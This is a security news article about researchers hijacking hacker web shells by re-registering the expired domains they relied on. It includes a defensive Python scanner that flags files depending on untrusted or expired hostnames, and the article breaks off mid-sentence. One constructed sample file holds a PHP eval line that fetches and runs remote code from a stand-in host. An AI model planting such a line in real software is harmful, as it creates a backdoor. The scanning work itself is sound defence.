Researchers Hijack Hacker Backdoors Through Abandoned Infrastructure


Shadow IT has long been a pressing concern for Chief Information Security Officers (CISOs). Forgotten systems, infrastructure, or hardware connected to enterprise networks often resurface as entry points for data breaches or compromises years later. However, new findings from watchTowr Labs reveal that this issue extends beyond enterprise networks, offering a unique opportunity to exploit the sloppy practices of malicious hackers themselves.
In a recent post, watchTowr Labs CEO Benjamin Harris and researcher Aliz Hammond unveiled their discovery of thousands of live backdoors used by hackers, accessed through abandoned infrastructure and expired domains.
“Put simply — we have been hijacking backdoors (that were reliant on now-abandoned infrastructure and/or expired domains) that themselves existed inside backdoors, and have since been watching the results flood in,” Harris and Hammond wrote.
Their method was to identify expired domains that older web shells still depended on, register them (often for as little as $20), and point them at a logging server of their own. From that vantage point the team tracked the traffic arriving from compromised hosts.
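The defensive corollary of this technique is that any deployed code which phones home to a hostname is only as safe as that hostname's registration. The following Python script is an added illustration, not code from the watchTowr write-up: it scans sample web content for external hostnames and flags those that are untrusted, with a distinct warning for domains whose registration has lapsed. The file contents, hostnames, allowlist and the registration lookup are all constructed stand-ins (a real scanner would query RDAP or WHOIS instead of the hard-coded table).

```python
"""
Added example (not from the watchTowr write-up): a defender-side scan for
web content that references external hostnames. A file that depends on an
expired domain can be taken over by whoever re-registers it, which is the
risk the article describes. All inputs below are constructed; the
registration lookup is a stub with no network access.
"""
import re
from dataclasses import dataclass

# Matches the hostname portion of an http(s) URL embedded in source text.
HOSTNAME_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)

# Constructed sample files: contents a webroot scan might encounter.
SAMPLE_FILES = {
    "/var/www/html/index.php":
        "<?php echo file_get_contents('https://cdn.example-corp.test/banner.html'); ?>",
    "/var/www/html/uploads/cache.php":
        "<?php @eval(file_get_contents('http://updates.abandoned-example.test/p.txt')); ?>",
    "/var/www/html/about.php":
        "<?php echo 'hello'; ?>",
    "/var/www/html/theme/footer.php":
        '<script src="https://stats.unknown-example.test/t.js"></script>',
}

# Hostnames the organization owns or trusts (constructed allowlist).
TRUSTED_HOSTS = {"cdn.example-corp.test"}

# Stand-in for a WHOIS/RDAP lookup (constructed data).
REGISTRATION_STATUS = {
    "cdn.example-corp.test": "registered",
    "updates.abandoned-example.test": "expired",
}


@dataclass(frozen=True)
class Finding:
    path: str
    hostname: str
    reason: str


def extract_hostnames(source):
    """Return the distinct, lower-cased hostnames referenced in a file body."""
    return sorted({m.group(1).lower() for m in HOSTNAME_RE.finditer(source)})


def registration_status(hostname):
    """Hypothetical lookup; a real scanner would query RDAP/WHOIS here."""
    return REGISTRATION_STATUS.get(hostname, "unknown")


def scan(files, trusted):
    """Flag every untrusted hostname a file depends on, worst cases first in
    the sense that an expired domain gets its own explicit reason."""
    findings = []
    for path, source in files.items():
        for host in extract_hostnames(source):
            if host in trusted:
                continue
            status = registration_status(host)
            if status == "expired":
                reason = "depends on an expired domain that a third party could register"
            elif status == "unknown":
                reason = "references an untrusted hostname of unknown registration status"
            else:
                reason = "references an untrusted hostname"
            findings.append(Finding(path, host, reason))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_FILES, TRUSTED_HOSTS):
        print(f"{f.path}: {f.hostname} ({f.reason})")
```

Run against the constructed inputs, the script reports the cached upload that loads code from an expired domain and the theme file that pulls a script from an unvetted host, while the allowlisted CDN reference is ignored. The same walk over a real webroot, with the stub replaced by a registration lookup, gives an inventory of which deployed files would become hijackable if a referenced domain were allowed to lapse.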
Among the attackers’ missteps were unprotected or poorly secured web shells, many of which contained code that enabled researche

[…]

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
